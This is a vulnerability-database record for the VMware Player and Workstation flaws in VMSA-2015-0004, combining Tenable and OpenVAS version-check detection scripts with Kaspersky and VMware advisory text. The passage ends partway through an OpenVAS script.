{"id": "VMWARE_PLAYER_6_0_6_VMSA_2015-0004.NASL", "bulletinFamily": "scanner", "title": "VMware Player 6.x < 6.0.6 Multiple Vulnerabilities (VMSA-2015-0004)", "description": "The version of VMware Player installed on the remote Windows host is\n6.x prior to 6.0.6. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An arbitrary code execution vulnerability exists due to\n a stack-based buffer overflow condition in the JPEG2000\n plugin that is triggered when parsing a Quantization\n Default (QCD) marker segment in a JPEG2000 (JP2) image\n file. A remote attacker can exploit this, using a\n specially crafted image, to execute arbitrary code or\n cause a denial of service condition. (CVE-2012-0897)\n\n - Multiple unspecified remote code execution\n vulnerabilities exists in 'TPView.dll' and 'TPInt.dll'\n library files. (CVE-2015-2336, CVE-2015-2337)\n\n - The 'TPview.dll' and 'TPInt.dll' library files fail to\n properly handle memory allocation. A remote attacker can\n exploit this to cause a denial of service.\n (CVE-2015-2338, CVE-2015-2339, CVE-2015-2340)\n\n - A denial of service vulnerability exists due to improper\n validation of user-supplied input to a remote procedure\n call (RPC) command. An unauthenticated, remote attacker\n can exploit this, via a crafted command, to crash the\n host or guest operating systems. (CVE-2015-2341)", "published": "2015-06-16T00:00:00", "modified": "2021-01-02T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/84219", "reporter": "This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.vmware.com/security/advisories/VMSA-2015-0004.html"], "cvelist": ["CVE-2015-2336", "CVE-2015-2338", "CVE-2015-2341", "CVE-2012-0897", "CVE-2015-2337", "CVE-2015-2340", "CVE-2015-2339"], "type": "nessus", "lastseen": "2021-01-01T07:00:05", "edition": 26, "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "kaspersky", "idList": ["KLA10597"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14539", "SECURITYVULNS:DOC:32210"]}, {"type": "vmware", "idList": ["VMSA-2015-0004"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310806760", "OPENVAS:1361412562310810680", "OPENVAS:1361412562310802576", "OPENVAS:1361412562310810679", "OPENVAS:802576", "OPENVAS:1361412562310810744", "OPENVAS:1361412562310810681", "OPENVAS:1361412562310806759", "OPENVAS:1361412562310810682"]}, {"type": "nessus", "idList": ["VMWARE_HORIZON_VIEW_CLIENT_VMSA_2015_0004.NASL", "IRFANVIEW_JPEG2000_STACK_OVERFLOW.NASL", "VMWARE_WORKSTATION_MULTIPLE_VMSA_2015_0004.NASL", "VMWARE_WORKSTATION_LINUX_10_0_6.NASL", "MACOSX_FUSION_7_0_1.NASL", "VMWARE_PLAYER_LINUX_6_0_6.NASL", "VMWARE_WORKSTATION_MULTIPLE_VMSA_2015_0001.NASL", "VMWARE_PLAYER_7_1_1_VMSA_2015-0004.NASL"]}, {"type": "cve", "idList": ["CVE-2015-2337", "CVE-2015-2336", "CVE-2012-0897", "CVE-2015-2339", "CVE-2015-2338", "CVE-2015-2341", "CVE-2015-2340"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:114409"]}, {"type": "exploitdb", "idList": ["EDB-ID:19519"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/IRFANVIEW_JPEG2000_BOF"]}], "modified": "2021-01-01T07:00:05", "rev": 2}, "score": {"value": 8.9, "vector": "NONE", "modified": "2021-01-01T07:00:05", "rev": 2}, "vulnersScore": 8.9}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84219);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\n \"CVE-2012-0897\",\n \"CVE-2015-2336\",\n \"CVE-2015-2337\",\n \"CVE-2015-2338\",\n \"CVE-2015-2339\",\n \"CVE-2015-2340\",\n \"CVE-2015-2341\"\n );\n script_bugtraq_id(\n 51426,\n 75092,\n 75094,\n 75095\n );\n script_xref(name:\"VMSA\", value:\"2015-0004\");\n\n script_name(english:\"VMware Player 6.x < 6.0.6 Multiple Vulnerabilities (VMSA-2015-0004)\");\n script_summary(english:\"Checks the VMware Player version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a virtualization application installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware Player installed on the remote Windows host is\n6.x prior to 6.0.6. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An arbitrary code execution vulnerability exists due to\n a stack-based buffer overflow condition in the JPEG2000\n plugin that is triggered when parsing a Quantization\n Default (QCD) marker segment in a JPEG2000 (JP2) image\n file. A remote attacker can exploit this, using a\n specially crafted image, to execute arbitrary code or\n cause a denial of service condition. (CVE-2012-0897)\n\n - Multiple unspecified remote code execution\n vulnerabilities exists in 'TPView.dll' and 'TPInt.dll'\n library files. (CVE-2015-2336, CVE-2015-2337)\n\n - The 'TPview.dll' and 'TPInt.dll' library files fail to\n properly handle memory allocation. A remote attacker can\n exploit this to cause a denial of service.\n (CVE-2015-2338, CVE-2015-2339, CVE-2015-2340)\n\n - A denial of service vulnerability exists due to improper\n validation of user-supplied input to a remote procedure\n call (RPC) command. An unauthenticated, remote attacker\n can exploit this, via a crafted command, to crash the\n host or guest operating systems. (CVE-2015-2341)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.vmware.com/security/advisories/VMSA-2015-0004.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware Player version 6.0.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-0897\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Irfanview JPEG2000 jp2 Stack Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_player_detect.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"VMware/Player/Path\", \"VMware/Player/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\nversion = get_kb_item_or_exit(\"VMware/Player/Version\");\npath = get_kb_item_or_exit(\"VMware/Player/Path\");\n\nfixed = '6.0.6';\nif (\n version =~ \"^6\\.\" &&\n ver_compare(ver:version, fix:fixed, strict:FALSE) == -1\n)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n report +=\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"VMware Player\", version, path);\n", "naslFamily": "Windows", "pluginID": "84219", "cpe": ["cpe:/a:vmware:player"], "scheme": null}

{"kaspersky": [{"lastseen": "2020-09-02T12:00:26", "bulletinFamily": "info", "cvelist": ["CVE-2015-2336", "CVE-2015-2338", "CVE-2015-2341", "CVE-2012-0897", "CVE-2015-2337", "CVE-2015-2340", "CVE-2015-2339"], "description": "### *Detect date*:\n06/09/2015\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in VMware products. Malicious users can exploit these vulnerabilities to cause denial of service or execute arbitrary code.\n\n### *Affected products*:\nVMware Workstation 11 versions earlier than 11.1.1 \nVMware Workstation 10 versions earlier than 10.0.6 \nVMware Player 7 versions earlier than 7.1.1 \nVMware Player 6 versions earlier than 6.0.6 \nVMware Horizon Client for Windows 3.3 versions earlier than 3.4.0 \nVMware Horizon Client for Windows 3.2 versions earlier than 3.2.1 \nVMware Fusion 7 versions earlier than 7.0.1 \nVMware Fusion 6 versions earlier than 6.0.6\n\n### *Solution*:\nUpdate to the latest version \n[Get VMware products](<https://my.vmware.com/web/vmware/downloads>)\n\n### *Original advisories*:\n[VMware bulletin](<http://www.vmware.com/security/advisories/VMSA-2015-0004.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[VMware Workstation](<https://threats.kaspersky.com/en/product/VMware-Workstation/>)\n\n### *CVE-IDS*:\n[CVE-2015-2337](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2337>)5.8High \n[CVE-2015-2336](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2336>)5.8High \n[CVE-2015-2339](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2339>)6.1High \n[CVE-2012-0897](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0897>)6.8High \n[CVE-2015-2341](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2341>)7.8Critical \n[CVE-2015-2340](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2340>)6.1High \n[CVE-2015-2338](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2338>)6.1High", "edition": 41, "modified": "2020-05-22T00:00:00", "published": "2015-06-09T00:00:00", "id": "KLA10597", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10597", "title": "\r KLA10597Multiple vulnerabilities in VMware products ", "type": "kaspersky", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:59", "bulletinFamily": "software", "cvelist": ["CVE-2015-2336", "CVE-2015-2338", "CVE-2015-2341", "CVE-2012-0897", "CVE-2015-2337", "CVE-2015-2340", "CVE-2015-2339"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- ------------------------------------------------------------------------\r\n VMware Security Advisory\r\n\r\nAdvisory ID: VMSA-2015-0004\r\nSynopsis: VMware Workstation, Fusion and Horizon View Client updates\r\n address critical security issues\r\nIssue Date: 2015-06-09\r\nUpdated on: 2015-06-09 &#40;Initial Advisory&#41;\r\nCVE number: CVE-2012-0897, CVE-2015-2336, CVE-2015-2337, CVE-2015-2338, \r\n CVE-2015-2339, CVE-2015-2340, CVE-2015-2341\r\n\r\n1. Summary\r\n\r\n VMware Workstation, Fusion and Horizon View Client updates address \r\n critical security issues.\r\n \r\n2. Relevant Releases\r\n\r\n VMware Workstation prior to version 11.1.1\r\n VMware Workstation prior to version 10.0.6\r\n VMware Player prior to version 7.1.1\r\n VMware Player prior to version 6.0.6\r\n VMware Fusion prior to version 7.0.1\r\n VMware Fusion prior to version 6.0.6\r\n\r\n VMware Horizon Client for Windows prior to version 3.4.0\r\n VMware Horizon Client for Windows prior to version 3.2.1\r\n VMware Horizon Client for Windows &#40;with local mode&#41; prior to version \r\n 5.4.1\r\n\r\n3. Problem Description \r\n\r\n a. VMware Workstation and Horizon Client memory manipulation issues\r\n\r\n VMware Workstation and Horizon Client TPView.ddl and TPInt.dll \r\n incorrectly handle memory allocation. On Workstation, this may\r\n allow a guest to execute code or perform a Denial of Service on \r\n the Windows OS that runs Workstation. In the case of a Horizon \r\n Client, this may allow a View desktop to execute code or perform \r\n a Denial of Service on the Windows OS that runs the Horizon Client.\r\n\r\n VMware would like to thank Kostya Kortchinsky of the Google \r\n Security Team for reporting these issues to us.\r\n\r\n The Common Vulnerabilities and Exposures project &#40;cve.mitre.org&#41; \r\n has assigned the identifiers CVE-2012-0897 and CVE-2015-2336 \r\n &#40;TPView.dll Code Execution&#41;, CVE-2015-2338 and CVE-2015-2339 \r\n &#40;TPview.dll DoS&#41;, CVE-2015-2337 &#40;TPInt.dll Code Execution&#41;, and \r\n CVE-2015-2340 &#40;TPInt.dll DoS&#41; to these issues.\r\n\r\n Column 4 of the following table lists the action required to \r\n remediate the vulnerability in each release, if a solution is \r\n available.\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch**\r\n ============= ======= ======= =================\r\n VMware Workstation 11.x Windows 11.1.1\r\n VMware Workstation 10.x Windows 10.0.6\r\n\r\n VMware Player 7.x Windows 7.1.1\r\n VMware Player 6.x Windows 6.0.6\r\n\r\n VMware Horizon Client for 3.3.x Windows 3.4.0\r\n Windows\r\n VMware Horizon Client for 3.2.x Windows 3.2.1\r\n Windows\r\n VMware Horizon Client for 5.x Windows 5.4.2\r\n Windows &#40;with local mode&#41;\r\n\r\n b. VMware Workstation, Player, and Fusion Denial of Service\r\n vulnerability\r\n\r\n VMware Workstation, Player, and Fusion contain an input \r\n validation issue on an RPC command. This issue may allow \r\n for a Denial of Service of the Guest Operating System &#40;32-bit&#41; or \r\n a Denial of Service of the Host Operating System &#40;64-bit&#41;. \r\n\r\n VMware would like to thank Peter Kamensky from Digital\r\n Security for reporting this issue to us.\r\n\r\n The Common Vulnerabilities and Exposures project &#40;cve.mitre.org&#41;\r\n has assigned the identifier CVE-2015-2341 to this issue. \r\n\r\n Column 4 of the following table lists the action required to\r\n remediate the vulnerability in each release, if a solution is \r\n available.\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch\r\n ============= ======= ======= =================\r\n Workstation 11.x any not affected\r\n Workstation 10.x any 10.0.5\r\n\r\n Player 7.x any not affected\r\n Player 6.x any 6.0.6\r\n\r\n Fusion 7.x OSX 7.0.1\r\n Fusion 6.x OSX 6.0.6\r\n\r\n4. Solution\r\n\r\n Please review the patch/release notes for your product and\r\n version and verify the checksum of your downloaded file.\r\n\r\n VMware Workstation 11.1.1, 10.0.6\r\n Downloads and Documentation:\r\n https://www.vmware.com/go/downloadworkstation\r\n\r\n VMware Player 7.1.1, 6.0.6\r\n Downloads and Documentation:\r\n https://www.vmware.com/go/downloadplayer\r\n\r\n VMware Fusion 7.0.1, 6.0.6 \r\n https://www.vmware.com/go/downloadfusion\r\n\r\n VMware Horizon Clients 5.4.2, 3.4.0, and 3.2.1\r\n Downloads and Documentation:\r\n https://www.vmware.com/go/viewclients\r\n\r\n5. References\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0897\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2336\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2337\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2338\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2339\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2340\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2341\r\n\r\n- ------------------------------------------------------------------------\r\n\r\n6. Change log\r\n\r\n 2015-06-09 VMSA-2015-0004 \r\n Initial security advisory in conjunction with the release of VMware \r\n Workstation 11.1.1 and Horizon Client for Windows 3.2.1 on 2015-06-09.\r\n\r\n- ------------------------------------------------------------------------\r\n\r\n7. Contact\r\n\r\n E-mail list for product security notifications and announcements:\r\n http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\r\n\r\n This Security Advisory is posted to the following lists:\r\n\r\n security-announce at lists.vmware.com\r\n bugtraq at securityfocus.com\r\n fulldisclosure at seclists.org\r\n\r\n E-mail: security at vmware.com\r\n PGP key at: http://kb.vmware.com/kb/1055\r\n\r\n VMware Security Advisories\r\n http://www.vmware.com/security/advisories\r\n\r\n Consolidated list of VMware Security Advisories\r\n http://kb.vmware.com/kb/2078735\r\n\r\n VMware Security Response Policy\r\n https://www.vmware.com/support/policies/security_response.html\r\n\r\n VMware Lifecycle Support Phases\r\n https://www.vmware.com/support/policies/lifecycle.html\r\n \r\n Twitter\r\n https://twitter.com/VMwareSRC\r\n\r\n Copyright 2015 VMware Inc. All rights reserved.\r\n\r\n \r\n \r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: Encryption Desktop 10.3.2 &#40;Build 15337&#41;\r\nCharset: utf-8\r\n\r\nwj8DBQFVdx3oDEcm8Vbi9kMRAngXAKClezVd4z7zQSx7oN2sY/e4xL2yQACfdjgt\r\nxZFTQoodunKFGfkCMqJ13M8=\r\n=z/Tn\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2015-06-14T00:00:00", "published": "2015-06-14T00:00:00", "id": "SECURITYVULNS:DOC:32210", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32210", "title": "NEW VMSA-2015-0004 - VMware Workstation, Fusion and Horizon View Client updates address critical security issues", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:00", "bulletinFamily": "software", "cvelist": ["CVE-2015-2336", "CVE-2015-2338", "CVE-2015-2341", "CVE-2012-0897", "CVE-2015-2337", "CVE-2015-2340", "CVE-2015-2339"], "description": "Multiple memory corruptions, DoS.", "edition": 1, "modified": "2015-06-14T00:00:00", "published": "2015-06-14T00:00:00", "id": "SECURITYVULNS:VULN:14539", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14539", "title": "VMWare applications multiple security vulnereabilities", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "vmware": [{"lastseen": "2019-11-06T16:05:32", "bulletinFamily": "unix", "cvelist": ["CVE-2015-2336", "CVE-2015-2338", "CVE-2015-2341", "CVE-2012-0897", "CVE-2015-2337", "CVE-2015-2340", "CVE-2015-2339"], "description": "a. VMware Workstation and Horizon Client memory manipulation issues \n \nVMware Workstation and Horizon Client TPView.dll and TPInt.dll incorrectly handle memory allocation. On Workstation, this may allow a guest to execute code or perform a Denial of Service on the Windows OS that runs Workstation. In the case of a Horizon Client, this may allow a View desktop to execute code or perform a Denial of Service on the Windows OS that runs the Horizon Client. \n \nVMware would like to thank Kostya Kortchinsky of the Google Security Team for reporting these issues to us. \n \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the identifiers CVE-2012-0897 and CVE-2015-2336 (TPView.dll Code Execution), CVE-2015-2338 and CVE-2015-2339 (TPview.dll DoS), CVE-2015-2337 (TPInt.dll Code Execution), and CVE-2015-2340 (TPInt.dll DoS) to these issues. \n \nColumn 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. \n \n\n", "edition": 4, "modified": "2015-06-09T00:00:00", "published": "2015-06-09T00:00:00", "id": "VMSA-2015-0004", "href": "https://www.vmware.com/security/advisories/VMSA-2015-0004.html", "title": "VMware Workstation, Fusion and Horizon View Client updates address critical security issues", "type": "vmware", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:34:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2336", "CVE-2015-2338", "CVE-2012-0897", "CVE-2015-2337", "CVE-2015-2340", "CVE-2015-2339"], "description": "The host is installed with VMware Workstation\n Player and is prone to code execution and denial-of-service vulnerabilities.", "modified": "2018-10-16T00:00:00", "published": "2017-04-07T00:00:00", "id": "OPENVAS:1361412562310810744", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810744", "type": "openvas", "title": "VMware Workstation Code Execution And DoS Vulnerabilities Apr17 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vmware_workstation_code_exec_n_dos_vuln_apr17_win.nasl 11923 2018-10-16 10:38:56Z mmartin $\n#\n# VMware Workstation Code Execution And DoS Vulnerabilities Apr17 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:vmware:workstation\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810744\");\n script_version(\"$Revision: 11923 $\");\n script_cve_id(\"CVE-2015-2340\", \"CVE-2015-2339\", \"CVE-2015-2338\", \"CVE-2015-2337\",\n \"CVE-2015-2336\", \"CVE-2012-0897\");\n script_bugtraq_id(75092, 75095, 51426);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-16 12:38:56 +0200 (Tue, 16 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-07 17:06:57 +0530 (Fri, 07 Apr 2017)\");\n script_name(\"VMware Workstation Code Execution And DoS Vulnerabilities Apr17 (Windows)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with VMware Workstation\n Player and is prone to code execution and denial-of-service vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to error in the\n 'TPView.dll' and 'TPInt.dll' which incorrectly handles memory allocation.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to execute arbitrary code and conduct a denial-of-service condition.\");\n\n script_tag(name:\"affected\", value:\"VMware Workstation Player 10.x before\n 10.0.6 and 11.x before 11.1.1 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Workstation Player version\n 10.0.6 or 11.1.1 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2015-0004.html\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_vmware_prdts_detect_win.nasl\");\n script_mandatory_keys(\"VMware/Win/Installed\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!vmwareVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(vmwareVer =~ \"^10\\.\")\n{\n if(version_is_less(version:vmwareVer, test_version:\"10.0.6\"))\n {\n report = report_fixed_ver(installed_version:vmwareVer, fixed_version:\"10.0.6\");\n security_message(data:report );\n exit(0);\n }\n}\n\nelse if(vmwareVer =~ \"^11\\.\")\n{\n if(version_is_less(version:vmwareVer, test_version:\"11.1.1\"))\n {\n report = report_fixed_ver(installed_version:vmwareVer, fixed_version:\"11.1.1\");\n security_message(data:report );\n exit(0);\n }\n}\n\nexit(99);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2336", "CVE-2015-2338", "CVE-2012-0897", "CVE-2015-2337", "CVE-2015-2340", "CVE-2015-2339"], "description": "The host is installed with VMware Player\n and is prone to code execution and denial-of-service vulnerabilities.", "modified": "2018-10-19T00:00:00", "published": "2017-04-07T00:00:00", "id": "OPENVAS:1361412562310810681", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810681", "type": "openvas", "title": "VMware Player Code Execution And DoS Vulnerabilities Apr17 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vmware_player_code_exec_n_dos_vuln_apr17_win.nasl 11982 2018-10-19 08:49:21Z mmartin $\n#\n# VMware Player Code Execution And DoS Vulnerabilities Apr17 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:vmware:player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810681\");\n script_version(\"$Revision: 11982 $\");\n script_cve_id(\"CVE-2015-2340\", \"CVE-2015-2339\", \"CVE-2015-2338\", \"CVE-2015-2337\",\n \"CVE-2015-2336\", \"CVE-2012-0897\");\n script_bugtraq_id(75092, 75095, 51426);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-19 10:49:21 +0200 (Fri, 19 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-07 18:06:57 +0530 (Fri, 07 Apr 2017)\");\n script_name(\"VMware Player Code Execution And DoS Vulnerabilities Apr17 (Windows)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with VMware Player\n and is prone to code execution and denial-of-service vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to error in the\n 'TPView.dll' and 'TPInt.dll' which incorrectly handles memory allocation.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to execute arbitrary code and conduct a denial-of-service condition.\");\n\n script_tag(name:\"affected\", value:\"VMware Player 6.x before 6.0.6 and 7.x\n before 7.1.1 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to VMware Player version 6.0.6\n or 7.1.1 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2015-0004.html\");\n\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_vmware_prdts_detect_win.nasl\");\n script_mandatory_keys(\"VMware/Player/Win/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!vmwareVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(vmwareVer =~ \"^6\\.\")\n{\n if(version_is_less(version:vmwareVer, test_version:\"6.0.6\"))\n {\n report = report_fixed_ver(installed_version:vmwareVer, fixed_version:\"6.0.6\");\n security_message(data:report );\n exit(0);\n }\n}\n\nelse if(vmwareVer =~ \"^7\\.\")\n{\n if(version_is_less(version:vmwareVer, test_version:\"7.1.1\"))\n {\n report = report_fixed_ver(installed_version:vmwareVer, fixed_version:\"7.1.1\");\n security_message(data:report );\n exit(0);\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2341"], "description": "The host is installed with VMware Fusion\n and is prone to denial-of-service vulnerability.", "modified": "2018-10-12T00:00:00", "published": "2017-04-07T00:00:00", "id": "OPENVAS:1361412562310810682", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810682", "type": "openvas", "title": "VMware Fusion 'RPC Command' Denial of Service Vulnerability (Mac OS X)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vmware_fusion_rpc_dos_vuln_macosx.nasl 11874 2018-10-12 11:28:04Z mmartin $\n#\n# VMware Fusion 'RPC Command' Denial of Service Vulnerability (Mac OS X)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nCPE = \"cpe:/a:vmware:fusion\";\n\nif(description)\n{\n 